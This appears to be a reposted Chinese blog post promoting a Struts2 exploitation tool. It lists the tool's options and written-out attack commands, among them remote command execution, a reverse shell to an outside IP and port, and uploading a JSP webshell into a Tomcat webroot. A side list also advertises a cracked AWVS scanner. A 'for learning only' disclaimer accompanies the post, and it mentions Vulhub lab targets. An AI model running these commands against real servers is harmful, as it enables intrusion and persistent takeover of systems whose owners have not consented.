Struts2利用工具

admin 2022年8月1日19:18:20评论494 views字数 1639阅读5分27秒阅读模式

Struts2漏洞利用扫描工具,基于互联网上已经公开的Structs2高危漏洞exp的扫描利用工具。


Struts2利用工具



参数说明


Struts2利用工具


Options:
  -i, --info 漏洞信息介绍
  -v, --version 显示工具版本
  -u, --url TEXT URL地址
  -n, --name TEXT 指定漏洞名称, 漏洞名称详见info
  -f, --file TEXT 批量扫描URL文件, 一行一个URL
  -d, --data TEXT POST参数, 需要使用的payload使用{exp}填充, 如: name=test&passwd={exp}
  -c, --encode TEXT 页面编码, 默认UTF-8编码
  -p, --proxy TEXT HTTP代理. 格式为http://ip:port
  -t, --timeout TEXT HTTP超时时间, 默认10s
  -w, --workers TEXT 批量扫描进程数, 默认为10个进程
  --header TEXT HTTP请求头, 格式为: key1=value1&key2=value2
  -e, --exec 进入命令执行shell
  --webpath 获取WEB路径
  -r, --reverse TEXT 反弹shell地址, 格式为ip:port
  --upfile TEXT 需要上传的文件路径和名称
  --uppath TEXT 上传的目录和名称, 如: /usr/local/tomcat/webapps/ROOT/shell.jsp
  -q, --quiet 关闭打印不存在漏洞的输出,只保留存在漏洞的输出
  -h, --help Show this message and exit.



使用例举


Struts2利用工具


单个URL漏洞检测
python3 Struts2Scan.py -u http://192.168.8.168:8080/index.action

批量漏洞检测
python3 Struts2Scan.py -f urls.txt

POST数据
python3 Struts2Scan.py -u http://192.168.8.168:8080/index.action -d name=admin&email=admin&age={exp}

指定漏洞名称利用
python3 Struts2Scan.py -u http://192.168.8.168:8080/index.action -n S2-016 --exec

反弹shll
python3 Struts2Scan.py -u http://192.168.8.168:8080/index.action -n S2-016 --reverse 192.168.8.8:8888

上传shell
python3 Struts2Scan.py -u http://192.168.8.168:8080/index.action -n S2-016 --upfile shell.jsp --uppath /usr/local/tomcat/webapps/ROOT/shell.jsp


漏洞测试环境


https://github.com/Medicean/VulApps/tree/master/s/struts2/
https://github.com/vulhub/vulhub/tree/master/struts2
# 基于Vulhub开源漏洞靶场,集合很多漏洞环境


微信公众号回复" S281"获取

往期推荐


AWVS 破解版14.9.220713150

可定制化poc漏洞扫描器

新的“Retbleed”推测执行攻击影响 AMD 和 Intel CPU



免责声明 

合一安全提供的资源仅供学习,利⽤本公众号合一安全所提供的信息⽽造成的任何直接或者间接的后果及损失,均由使⽤者本⼈负责,公众号合一安全及作者不为此承担任何责任,一旦造成后果请⾃⾏承担责任!合一安全部分内容及图片源自网络转载,版权归作者及授权人所有,若您发现有侵害您的权利,请联系我们进行删除处理。谢谢 !

原文始发于微信公众号(合一安全):Struts2利用工具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月1日19:18:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Struts2利用工具http://cn-sec.com/archives/1214295.html

发表评论

匿名网友 填写信息